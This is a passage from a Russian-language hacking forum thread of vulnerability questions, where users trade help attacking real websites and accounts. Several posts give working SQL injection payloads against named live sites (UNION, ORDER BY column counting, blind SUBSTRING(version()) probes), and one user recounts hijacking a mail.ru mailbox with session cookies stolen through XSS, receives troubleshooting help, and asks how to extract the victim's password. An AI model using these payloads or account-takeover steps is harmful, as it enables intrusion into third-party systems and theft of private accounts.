Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Хорошо, пусть это будет PostgreSQL. =)
    Ну помочь то сможешь? Там мускул стоит мне кажется, т.к. 3306 открыт.Или я ошибаюсь и все бд используют этот порт?
     
  2. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    есть, если в куках есть пароль и знать алгоритм шифрования пароля
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    PHP:
    <?php 
    $q 
    'ООтправить';
    $s mb_detect_encoding($q);//Определяем кодировку
    $q iconv($s'CP1251//TRANSLIT'$q);//Декодируем
    echo $s "\r\n";
    echo 
    $q "\r\n";
    ?>
     
    1 person likes this.
  5. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    Ввожу:
    .../srt.php?id=-1+union+select+1,2,3--+
    Получаю:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LEFT JOIN categories on torrents.category = categories.id LEFT JOIN sub_categori' at line 22

    Есть идеи как строится запрос и в каком направлении нужно раскручивать?
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    когда видишь такое - LEFT JOIN - только слепая скуля, т.к. кол-во колонок не подберешь из-за участия в данном запросе не только одной таблицы.

    Либо blind, либо ищи другую ссылку на этом же сайте, где запросы попроще
     
  7. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    Со слепыми ещё не сталкивался, но буду пробовать.
    (искать другую не вариант, т.к. даже для этой потребовались права модератора)
    Есть мыски куда копать?
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 Gray_Wolf

    .../srt.php?id=1+AND+(SUBSTRING((select+version()),1,1))>33..127
     
  9. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    Спасибо, думаю дальше смогу сам раскрутить.
     
  10. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    заблуждаешься
    Code:
    mysql> SELECT 1,2 FROM mysql.user LEFT JOIN mysql.db ON(1=1) UNION SELECT 3,4;
    +---+---+
    | 1 | 2 |
    +---+---+
    | 1 | 2 |
    | 3 | 4 |
    +---+---+
    2 rows in set (0.00 sec)
     
  11. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Можно ведь и проще:
    .../srt.php?id=1+AND+SUBSTRING(version(),1,1)<5
     
  12. led232

    led232 New Member

    Joined:
    17 Sep 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Прошу извенить если не туда запостил, вот какая проблема :
    просмотрел видео на ачате как ломать майл.ру с помощью ксс http://video.antichat.org/file213.html..так вот там при получении кукис нужно подставлять их в оперу.кукис получил через сниф подставил в оперу все как надо.но при заходе на http://win.mail.ru/cgi-bin/start не логиниться а выбрасывает на страницу логаут.на которой в поле логин - логин вставляеться , а пароль нет, на месте пароля пустое окно.Подскажите плз что нужно сделать чтобы попасть в ак?
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    устарела сессия. Куки просрочены. Или криво в оперу вставил.
     
  14. led232

    led232 New Member

    Joined:
    17 Sep 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    да вы были правы!
    только вот теперь встала другая делема:
    я в ящик зашел , Но как терь пароль то узнать?
    плиз сильно не пинайте, человек существо любопытное, все ему интересно, я делаю это первый раз ...
    подскажите если не трудно возможно ли узнать пароль как то ?
     
  15. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    пацаны,а как дальше?
    http://www.hobby.net.ua/product_info.php?cPath=132&products_id=74266%27%20order%20by%203/*
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    там нет скули. Просто нет
     
    2 people like this.
  17. Naydav

    Naydav Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    439
    Likes Received:
    63
    Reputations:
    4
    Вопрос по sql-injection

    Вообщем есть скула, вида
    http://site/551111', ошибка ессно не выводится

    После некоторых манипуляций:
    http://site/1111) -- -- comment
    Ошибку не выдает, причем обязательно после двух "-- --"

    Запрос вида
    -1) OR id IN(5,6,7,8) ) ORDER BY id LIMIT 2-- -- comment
    работает, поэтому смею предположить, что запрос однострочный, или это его последняя строка

    Но вот дальше, не могу понять в чем дело :(

    Запросы вида:
    -1 ) GROUP by 1
    -1 ) UNION SELECT 1
    - не работают

    cо вторым понятно, что скорее всего, в запросе стоит "SELECT * ", а не "SELECT `id`, ...", что вызывает ошибку different numbers of columns

    Но как быть со вторым?
    причем что
    -1 ) GROUP by id
    работает

    И вот еще такое замечание
    -1 ) ORDER BY 1 -- --
    Работает, но любое другое значение отличное от единицы уже не работает, напр
    -1 ) ORDER BY 2 -- --

    запрос скорее всего с join-ами

    прошу помочь советом

    пс
    Начинаю думать, что на станице 2 запроса, один для получения поля, для второго запроса, а второй непосредственно для отображения инфы
     
    #6137 Naydav, 27 Mar 2009
    Last edited: 27 Mar 2009
  18. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Пример order+by

    http://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+1--
    нет ошибки, полей больше одного.
    htthttp://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+100--
    ошибка, полей меньше ста
    http://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+99--
    нет ошибки, значит полей 99
     
    #6138 farex, 27 Mar 2009
    Last edited: 27 Mar 2009
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    farex
    Мухаха, слушай дружище, ты подвязывай с тяжёлыми наркотиками , а то я минуса буду ставить :)

    Это цитата с этого поста :
    http://forum.antichat.ru/showpost.php?p=433629&postcount=25

    Это 3 страница топика, а мы сейчас на 622 :D
     
    #6139 Kakoytoxaker, 27 Mar 2009
    Last edited: 27 Mar 2009
    3 people like this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    да ладно тебе Jokester , человек хотел помочь, главное что хотел :))))))
    ну а ефект такой может и после легких наркотиков :))
     
Thread Status:
Not open for further replies.